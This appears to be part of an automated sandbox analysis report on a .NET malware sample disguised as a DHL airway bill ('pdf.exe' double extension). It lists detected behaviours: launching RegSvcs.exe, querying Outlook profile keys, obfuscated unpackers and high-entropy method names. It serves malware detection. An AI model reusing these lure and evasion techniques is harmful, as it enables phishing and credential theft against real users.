                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: AWB DHL#40882993049403.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: AWB DHL#40882993049403.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: AWB DHL#40882993049403.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: JJHI.pdbSHA256 source: AWB DHL#40882993049403.pdf.exe
                      Source: Binary string: JJHI.pdb source: AWB DHL#40882993049403.pdf.exe

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: AWB DHL#40882993049403.pdf.exe, frm_login.cs.Net Code: InitializeComponent
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.64c0000.5.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.64c0000.5.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, PaFAxtkSXK2Z0KMn6S.cs.Net Code: kjIFxWek42 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, PaFAxtkSXK2Z0KMn6S.cs.Net Code: kjIFxWek42 System.Reflection.Assembly.Load(byte[])
                      Source: AWB DHL#40882993049403.pdf.exeStatic PE information: 0xFFBAF889 [Wed Dec 16 21:50:01 2105 UTC]
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_02D3F110 pushad ; iretd 0_2_02D3F111
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A24C38 push esp; retf 0_2_05A24C39
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A20C01 push 8BBCEB50h; ret 0_2_05A20C07
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A46CC4 push esp; iretd 3_2_06A46CFD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A40F01 pushfd ; iretd 3_2_06A40F0D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A4B691 push es; ret 3_2_06A4B6A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A47312 push es; ret 3_2_06A47320
                      Source: AWB DHL#40882993049403.pdf.exeStatic PE information: section name: .text entropy: 7.160837106255626
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, Ll3PIg3HHj4jqsAJXv.csHigh entropy of concatenated method names: 'B4JNEGhmCi', 'A8DNvXMhFY', 'ToString', 'rn3Nclr2VB', 'cWwNahyDMT', 'VJ3NQN2Paw', 'yJsNlOH3Ki', 'druN70l6ci', 'cQ2NZcIuc1', 'z9xN4yUqMk'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, PaFAxtkSXK2Z0KMn6S.csHigh entropy of concatenated method names: 'XbsSL8IFtq', 'QRIScBW6y3', 'XrpSaDCfwB', 'qDOSQBy7M7', 'PUuSlIeGim', 'doSS74lsRJ', 'S6USZl0LGk', 'zFbS45tG1H', 'vAcSt5v0pN', 'xCxSEtjKK1'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, dOmZvwYcJ3bJQ1K7e3.csHigh entropy of concatenated method names: 'niW7LxImRF', 'G1D7abyQcv', 'sJB7l1rRVJ', 'p8n7Za3gCg', 'PNu74R2MgT', 'ii2lyZUnUt', 'mYnl5p0bnE', 'vAylbkaVWp', 'tIHl1b5lR3', 'TDrlh2KN3e'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, XavOPJ7y9FcfyvCWjV.csHigh entropy of concatenated method names: 'f4GQwK4XU1', 'T1DQVEd9pl', 'rG4Qsvr9ew', 'jsGQgbxsXK', 'DqnQ3FAy7U', 'cZ3Q20S5Ka', 'aJrQNpqhWB', 'wZaQHitoAu', 'nY5QdJehtV', 'YapQTwyD09'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, KRSvHCcV7gUZ39QS3e.csHigh entropy of concatenated method names: 'wLUZcSBibi', 'MpfZQiyD2t', 'ABAZ7dMTJ5', 'yas7iDVNME', 'MqX7zF0uks', 'zT4Z9DCgJk', 'A0kZ6hxdJt', 'wGwZql9TiH', 'QZvZSn0rEv', 'i8aZFM1mMH'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, Qm7wtfItMS1KZhC0BH.csHigh entropy of concatenated method names: 'yhDd6WSrP8', 'fBsdSOem2a', 'cnndFL6yho', 'tmmdcyKYUj', 'j5cdausMCZ', 'Ie9dlPsFaT', 'AhEd78dBLO', 'nBxHbMjfGA', 'uurH1qjXEl', 'YtgHhUsDLh'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, gUYTx7zTaHPcA8E230.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bNNdOQPXxp', 'jgKd3lclWy', 'gCid2OiWCi', 'Uv2dNg9MI3', 'DoGdHCd1Aw', 'XoMddT1GG7', 'PDadT1AxF0'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, ohc82Wdo6MQn9twU9X.csHigh entropy of concatenated method names: 'iMiHKU9iq1', 'ID4HnrA3Bh', 'QhsH8tGdeU', 'EnnHJCwk3K', 'XntHmd6DHh', 'zwNHPyZDlg', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, GRS3NlF8YJ6uTX5DNu.csHigh entropy of concatenated method names: 'ghU6ZmyHYM', 'K2T64nE31G', 's5G6ENebqQ', 'eBY6vANwVI', 'cUg632EHaF', 'QNJ626stL1', 'hnaexYfaNgasKRoQpF', 'OvS78OnIXiUDSkxhOF', 'UJH66xbygl', 'TGu6S04qvI'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, Q2hIxEW7puPvXh91u4.csHigh entropy of concatenated method names: 'ToString', 'eF92k818HQ', 'IY32nF52ln', 'JIb28ZGEjc', 'unC2Jfx03x', 'bVX2PIY6wv', 'oLh2W5Q1p6', 'mpM2DdUV1j', 'xiU2BAa0Ha', 'gpg2jONs8h'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, bo55ekTyRCk67yIfAQ.csHigh entropy of concatenated method names: 'bvwZoGyJc5', 'TaPZfT6ySY', 'tRqZxbtJ5X', 'tHcZwSOXjR', 'p97ZI6p49D', 'HchZVgqRnT', 'CXWZYYXjHg', 'nMlZs3IuX5', 'JuIZgaJNqx', 'GF9ZpbZFVA'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, bnoHRT9hdPt9cQOBU9.csHigh entropy of concatenated method names: 'ppPx84nJf', 'LAjwErKeO', 'pAjVwBl0p', 'y82YZZfFD', 'H46ge5JZJ', 'ueYpTh0tl', 'E0Tq0DBTuxpU8OP1pJ', 'RjZQ67ifY4gYqaTTWD', 'H24HdtPoT', 'GiTTNwHTH'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, BEW4rqhvQAwW9nbdY9.csHigh entropy of concatenated method names: 'MgKN1xVanX', 'gOnNiJadQN', 'XCfH9FoS6L', 'AUUH6aXcwK', 'Pi8Nk5Mp4P', 'c5rNUlvnaj', 'horNr8scrp', 'gwJNmyqNTK', 'yVKNRl7TaZ', 'LLANXUS2sb'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, EPPBiYLMwfOahZetcr.csHigh entropy of concatenated method names: 'AuFOsrcZWK', 'SROOgrcYFR', 'zvtOKlpbVR', 'oWxOnGjwnf', 'RQQOJRNfhA', 'im8OPQaGI5', 'pOEODc9Hws', 'nvaOBidSpV', 'R76OMOs2lO', 'GvSOkYNr6A'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, fwVJJWlEtVmSefL0fCG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PZmTmFjAHV', 'S29TRbpERu', 'cLJTXgSQQT', 'vcCT0HgC27', 'w1YTy1CJjY', 'bs4T5CMDEq', 'u8rTbW4OQB'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, qO4Z9xt0en1avIDhdN.csHigh entropy of concatenated method names: 'rnyam0NnwA', 'xHyaRwOhfR', 'UbEaXMHpcY', 'kKga0PSoVi', 'tTdaywFE6x', 'BLfa5y4NDD', 'X7Sab1DhKc', 'ca1a1IKK41', 'V1hahwlVZh', 'U6YaiGpi4O'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, MaVoDSlp9MC9bZAmJYs.csHigh entropy of concatenated method names: 'gFtdooMBgc', 'JBEdf7ZGCg', 'jIxdxBEPmS', 'PrMdwwypi1', 'lAPdIGCwsK', 'hW3dVQ4DwL', 'WYwdYxjeJ5', 'bMedsduLC6', 'e7hdgQwweJ', 'Xqrdp13K7G'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, JL7gbFo71R8eaKTWhv.csHigh entropy of concatenated method names: 'Dispose', 'wKk6hjhgTA', 'imVqntJCtD', 'hqCuuIGGrl', 'zIH6iloXwl', 'L316zFoult', 'ProcessDialogKey', 'VZHq95cjvk', 'DY4q6rQsu9', 'Scnqq2MQkr'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, WWrdoQvMO4I0paKyTU.csHigh entropy of concatenated method names: 'cal3M4pgJe', 'V2j3UTjaCu', 'uUU3mTU3Hp', 'd8Q3RiQHSU', 'pEM3n7mcDO', 'wp838hoFaY', 'K1B3JIfqkk', 'b1M3PiLdJ5', 'ii33Wo9JdI', 'cFj3D45Ps8'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, Mia6hjeLSVY2LFjtdt.csHigh entropy of concatenated method names: 'IAKHc0XmK5', 'zC8HaSlvhN', 'TL9HQ6AQIO', 'jGAHlcecme', 'vIMH79qvmb', 'SwcHZ9p4Vk', 'VDUH4eQYQH', 'EOYHtYr4sB', 'vIjHEBhYWV', 'fDZHvds176'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, Ll3PIg3HHj4jqsAJXv.csHigh entropy of concatenated method names: 'B4JNEGhmCi', 'A8DNvXMhFY', 'ToString', 'rn3Nclr2VB', 'cWwNahyDMT', 'VJ3NQN2Paw', 'yJsNlOH3Ki', 'druN70l6ci', 'cQ2NZcIuc1', 'z9xN4yUqMk'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, PaFAxtkSXK2Z0KMn6S.csHigh entropy of concatenated method names: 'XbsSL8IFtq', 'QRIScBW6y3', 'XrpSaDCfwB', 'qDOSQBy7M7', 'PUuSlIeGim', 'doSS74lsRJ', 'S6USZl0LGk', 'zFbS45tG1H', 'vAcSt5v0pN', 'xCxSEtjKK1'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, dOmZvwYcJ3bJQ1K7e3.csHigh entropy of concatenated method names: 'niW7LxImRF', 'G1D7abyQcv', 'sJB7l1rRVJ', 'p8n7Za3gCg', 'PNu74R2MgT', 'ii2lyZUnUt', 'mYnl5p0bnE', 'vAylbkaVWp', 'tIHl1b5lR3', 'TDrlh2KN3e'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, XavOPJ7y9FcfyvCWjV.csHigh entropy of concatenated method names: 'f4GQwK4XU1', 'T1DQVEd9pl', 'rG4Qsvr9ew', 'jsGQgbxsXK', 'DqnQ3FAy7U', 'cZ3Q20S5Ka', 'aJrQNpqhWB', 'wZaQHitoAu', 'nY5QdJehtV', 'YapQTwyD09'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, KRSvHCcV7gUZ39QS3e.csHigh entropy of concatenated method names: 'wLUZcSBibi', 'MpfZQiyD2t', 'ABAZ7dMTJ5', 'yas7iDVNME', 'MqX7zF0uks', 'zT4Z9DCgJk', 'A0kZ6hxdJt', 'wGwZql9TiH', 'QZvZSn0rEv', 'i8aZFM1mMH'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, Qm7wtfItMS1KZhC0BH.csHigh entropy of concatenated method names: 'yhDd6WSrP8', 'fBsdSOem2a', 'cnndFL6yho', 'tmmdcyKYUj', 'j5cdausMCZ', 'Ie9dlPsFaT', 'AhEd78dBLO', 'nBxHbMjfGA', 'uurH1qjXEl', 'YtgHhUsDLh'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, gUYTx7zTaHPcA8E230.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bNNdOQPXxp', 'jgKd3lclWy', 'gCid2OiWCi', 'Uv2dNg9MI3', 'DoGdHCd1Aw', 'XoMddT1GG7', 'PDadT1AxF0'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, ohc82Wdo6MQn9twU9X.csHigh entropy of concatenated method names: 'iMiHKU9iq1', 'ID4HnrA3Bh', 'QhsH8tGdeU', 'EnnHJCwk3K', 'XntHmd6DHh', 'zwNHPyZDlg', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, GRS3NlF8YJ6uTX5DNu.csHigh entropy of concatenated method names: 'ghU6ZmyHYM', 'K2T64nE31G', 's5G6ENebqQ', 'eBY6vANwVI', 'cUg632EHaF', 'QNJ626stL1', 'hnaexYfaNgasKRoQpF', 'OvS78OnIXiUDSkxhOF', 'UJH66xbygl', 'TGu6S04qvI'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, Q2hIxEW7puPvXh91u4.csHigh entropy of concatenated method names: 'ToString', 'eF92k818HQ', 'IY32nF52ln', 'JIb28ZGEjc', 'unC2Jfx03x', 'bVX2PIY6wv', 'oLh2W5Q1p6', 'mpM2DdUV1j', 'xiU2BAa0Ha', 'gpg2jONs8h'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, bo55ekTyRCk67yIfAQ.csHigh entropy of concatenated method names: 'bvwZoGyJc5', 'TaPZfT6ySY', 'tRqZxbtJ5X', 'tHcZwSOXjR', 'p97ZI6p49D', 'HchZVgqRnT', 'CXWZYYXjHg', 'nMlZs3IuX5', 'JuIZgaJNqx', 'GF9ZpbZFVA'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, bnoHRT9hdPt9cQOBU9.csHigh entropy of concatenated method names: 'ppPx84nJf', 'LAjwErKeO', 'pAjVwBl0p', 'y82YZZfFD', 'H46ge5JZJ', 'ueYpTh0tl', 'E0Tq0DBTuxpU8OP1pJ', 'RjZQ67ifY4gYqaTTWD', 'H24HdtPoT', 'GiTTNwHTH'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, BEW4rqhvQAwW9nbdY9.csHigh entropy of concatenated method names: 'MgKN1xVanX', 'gOnNiJadQN', 'XCfH9FoS6L', 'AUUH6aXcwK', 'Pi8Nk5Mp4P', 'c5rNUlvnaj', 'horNr8scrp', 'gwJNmyqNTK', 'yVKNRl7TaZ', 'LLANXUS2sb'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, EPPBiYLMwfOahZetcr.csHigh entropy of concatenated method names: 'AuFOsrcZWK', 'SROOgrcYFR', 'zvtOKlpbVR', 'oWxOnGjwnf', 'RQQOJRNfhA', 'im8OPQaGI5', 'pOEODc9Hws', 'nvaOBidSpV', 'R76OMOs2lO', 'GvSOkYNr6A'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, fwVJJWlEtVmSefL0fCG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PZmTmFjAHV', 'S29TRbpERu', 'cLJTXgSQQT', 'vcCT0HgC27', 'w1YTy1CJjY', 'bs4T5CMDEq', 'u8rTbW4OQB'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, qO4Z9xt0en1avIDhdN.csHigh entropy of concatenated method names: 'rnyam0NnwA', 'xHyaRwOhfR', 'UbEaXMHpcY', 'kKga0PSoVi', 'tTdaywFE6x', 'BLfa5y4NDD', 'X7Sab1DhKc', 'ca1a1IKK41', 'V1hahwlVZh', 'U6YaiGpi4O'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, MaVoDSlp9MC9bZAmJYs.csHigh entropy of concatenated method names: 'gFtdooMBgc', 'JBEdf7ZGCg', 'jIxdxBEPmS', 'PrMdwwypi1', 'lAPdIGCwsK', 'hW3dVQ4DwL', 'WYwdYxjeJ5', 'bMedsduLC6', 'e7hdgQwweJ', 'Xqrdp13K7G'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, JL7gbFo71R8eaKTWhv.csHigh entropy of concatenated method names: 'Dispose', 'wKk6hjhgTA', 'imVqntJCtD', 'hqCuuIGGrl', 'zIH6iloXwl', 'L316zFoult', 'ProcessDialogKey', 'VZHq95cjvk', 'DY4q6rQsu9', 'Scnqq2MQkr'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, WWrdoQvMO4I0paKyTU.csHigh entropy of concatenated method names: 'cal3M4pgJe', 'V2j3UTjaCu', 'uUU3mTU3Hp', 'd8Q3RiQHSU', 'pEM3n7mcDO', 'wp838hoFaY', 'K1B3JIfqkk', 'b1M3PiLdJ5', 'ii33Wo9JdI', 'cFj3D45Ps8'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, Mia6hjeLSVY2LFjtdt.csHigh entropy of concatenated method names: 'IAKHc0XmK5', 'zC8HaSlvhN', 'TL9HQ6AQIO', 'jGAHlcecme', 'vIMH79qvmb', 'SwcHZ9p4Vk', 'VDUH4eQYQH', 'EOYHtYr4sB', 'vIjHEBhYWV', 'fDZHvds176'

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Uses an obfuscated file name to hide its real file extension (double extension)
                      Source: Possible double extension: pdf.exeStatic PE information: AWB DHL#40882993049403.pdf.exe
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
